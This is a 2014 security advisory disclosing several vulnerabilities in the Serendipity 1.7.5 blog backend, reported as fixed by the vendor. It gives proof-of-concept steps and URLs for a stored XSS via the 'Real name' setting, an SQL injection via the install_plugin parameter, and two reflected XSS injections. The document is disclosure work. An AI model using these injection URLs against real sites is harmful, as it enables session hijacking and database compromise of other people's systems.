Advisory: Serendipity 1.7.5 - Multiple security vulnerabilities Advisory ID: SSCHADV2014-003 Author: Stefan Schurtz Affected Software: Successfully tested on Serendipity 1.7.5 Vendor URL: http://www.s9y.org/ Vendor Status: fixed ========================== Vulnerability Description ========================== The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities ========================== PoC-Exploit ========================== // Stored-XSS with "Real name" (1) Login as "Standard editor" user (2) Under "Personal Settings" set your "Real name" to "> The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users) // SQL-Injection - with "serendipity[install_plugin]" http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi] // Reflected XSS_1 - "serendipity[install_plugin]" http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912 // Reflected XSS_2 - "serendipity[id]" POST http://[target]/serendipity/serendipity_admin.php? serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">